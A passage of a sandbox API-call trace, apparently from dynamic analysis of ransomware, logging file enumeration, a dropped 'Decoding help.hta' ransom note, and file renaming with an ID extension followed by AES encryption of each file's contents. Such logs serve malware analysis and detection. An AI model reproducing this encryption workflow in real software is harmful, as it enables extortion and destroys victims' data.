lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 53 [0045.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Support" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" [0045.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*" [0045.110] GlobalMemoryStatus (in: lpBuffer=0x1af1fd10 | out: lpBuffer=0x1af1fd10) [0045.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245202b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.125] CloseHandle (hObject=0x38c) returned 1 [0045.125] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 0 [0045.125] FindClose (in: hFindFile=0x5e2ab0 | out: hFindFile=0x5e2ab0) returned 1 Thread: id = 417 os_tid = 0xb58 [0043.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*", lpFindFileData=0x1b05fd30 | out: lpFindFileData=0x1b05fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527793d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2af0 [0045.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.057] FindNextFileW (in: hFindFile=0x5e2af0, lpFindFileData=0x1b05fd30 | out: lpFindFileData=0x1b05fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527793d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.057] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.057] FindNextFileW (in: hFindFile=0x5e2af0, lpFindFileData=0x1b05fd30 | out: lpFindFileData=0x1b05fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11231710, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0045.057] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0045.057] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0045.057] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0045.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0045.057] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned 65 [0045.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033" [0045.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*" [0045.057] GlobalMemoryStatus (in: lpBuffer=0x1b05fd10 | out: lpBuffer=0x1b05fd10) [0045.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113dc5e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x30c [0045.071] CloseHandle (hObject=0x30c) returned 1 [0045.071] FindNextFileW (in: hFindFile=0x5e2af0, lpFindFileData=0x1b05fd30 | out: lpFindFileData=0x1b05fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a0300, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x557a0300, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x11348, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTAClientPkg.dll", cAlternateFileName="VSTACL~1.DLL")) returned 1 [0045.071] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0045.071] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned 65 [0045.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta" [0045.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\decoding help.hta")) returned 0xffffffff [0045.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0045.449] WriteFile (in: hFile=0x460, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b05fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b05fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.450] CloseHandle (hObject=0x460) returned 1 [0045.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0049.615] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VSTAClientPkg.dll") returned -1 [0049.615] lstrlenW (lpString="VSTAClientPkg.dll") returned 17 [0049.615] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0049.615] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned 65 [0049.615] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\", lpString2="VSTAClientPkg.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" [0049.615] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" [0049.615] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0052.278] CreateFileMappingA (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0052.278] CryptAcquireContextA (in: phProv=0x1b05fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1b05fcec*=0x3449e80) returned 1 [0054.938] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x1b05fce8 | out: phKey=0x1b05fce8*=0x5d8650) returned 1 [0054.939] CryptExportKey (in: hKey=0x5d8650, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1b05fbe4, pdwDataLen=0x1b05fce4 | out: pbData=0x1b05fbe4*, pdwDataLen=0x1b05fce4*=0x2c) returned 1 [0054.939] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11340) returned 0x550000 [0054.947] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b05fbe4*, pdwDataLen=0x1b05fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1b05fbe4*, pdwDataLen=0x1b05fcf8*=0x100) returned 1 [0054.947] CryptEncrypt (in: hKey=0x5d8650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x1b05fce4*=0x11340, dwBufLen=0x11340 | out: pbData=0x550000*, pdwDataLen=0x1b05fce4*=0x11340) returned 1 [0054.958] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0054.960] CloseHandle (hObject=0x284) returned 1 [0054.960] CryptDestroyKey (hKey=0x5d8650) returned 1 [0054.960] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.960] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.960] WriteFile (in: hFile=0x458, lpBuffer=0x1b05fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1b05fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1b05fbe4*, lpNumberOfBytesWritten=0x1b05fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.950] WriteFile (in: hFile=0x458, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1b05fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1b05fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.950] CloseHandle (hObject=0x458) returned 1 [0056.950] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.507] FindNextFileW (in: hFindFile=0x5e2af0, lpFindFileData=0x1b05fd30 | out: lpFindFileData=0x1b05fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e67c00, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51e67c00, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x4a548, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTAProject.dll", cAlternateFileName="VSTAPR~1.DLL")) returned 1 [0058.507] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0058.507] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned 65 [0058.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta" [0058.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\decoding help.hta")) returned 0x1 [0058.508] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VSTAProject.dll") returned -1 [0058.508] lstrlenW (lpString="VSTAProject.dll") returned 15 [0058.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0058.508] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned 65 [0058.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\", lpString2="VSTAProject.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" [0058.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" [0058.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0058.509] CreateFileMappingA (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6e8 [0058.509] CryptAcquireContextA (in: phProv=0x1b05fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1b05fcec*=0x2aac6bb0) returned 1 [0060.227] CryptGenKey (in: hProv=0x2aac6bb0, Algid=0x6610, dwFlags=0x1, phKey=0x1b05fce8 | out: phKey=0x1b05fce8*=0x10f14400) returned 1 [0060.227] CryptExportKey (in: hKey=0x10f14400, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1b05fbe4, pdwDataLen=0x1b05fce4 | out: pbData=0x1b05fbe4*, pdwDataLen=0x1b05fce4*=0x2c) returned 1 [0060.227] MapViewOfFile (hFileMappingObject=0x6e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a540) Thread: id = 418 os_tid = 0xb38 [0043.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x1b19fd30 | out: lpFindFileData=0x1b19fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x23107a10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x23107a10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b30 [0045.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.069] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b19fd30 | out: lpFindFileData=0x1b19fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x23107a10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x23107a10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.069] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.069] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b19fd30 | out: lpFindFileData=0x1b19fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x23049330, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x23049330, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x230955f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0045.069] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0045.069] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 79 [0045.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" [0045.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta")) returned 0x1 [0045.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0045.070] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b19fd30 | out: lpFindFileData=0x1b19fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xcad7040, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x230e18b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x89a, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0045.070] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0045.070] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 79 [0045.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" [0045.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta")) returned 0x1 [0045.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.070] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0045.070] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.070] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b19fd30 | out: lpFindFileData=0x1b19fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x23721270, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x71680, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 1 [0045.070] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0045.070] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 79 [0045.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" [0045.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta")) returned 0x1 [0045.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.070] lstrlenW (lpString="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 41 [0045.070] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.070] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b19fd30 | out: 